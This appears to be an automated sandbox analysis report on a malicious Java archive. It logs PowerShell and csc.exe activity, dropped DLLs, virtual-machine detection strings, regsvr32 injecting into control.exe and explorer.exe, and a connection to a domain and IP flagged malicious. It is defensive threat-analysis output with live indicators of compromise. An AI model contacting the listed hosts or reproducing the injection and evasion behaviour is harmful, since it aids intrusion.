Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Windows Analysis Report wuxvGLNrxG.jar

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4137			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4064			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6348	Thread sleep time: -1773297476s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5568	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp	Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp	Binary or memory string: \|[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: regsvr32.exe, 00000006.00000003.900452153.0000000002EA8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000011.00000003.815205220.000002CF91D0F000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: java.exe, 00000002.00000002.681160126.000000000078B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.228.233.17 80			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6173612E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: AC0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6173612E0	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 9EC000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.216.53	data.green-iraq.com	United States		46606	UNIFIEDLAYER-AS-1US	false
185.228.233.17	gtr.antoinfer.com	Russian Federation		64439	ITOS-ASRU	true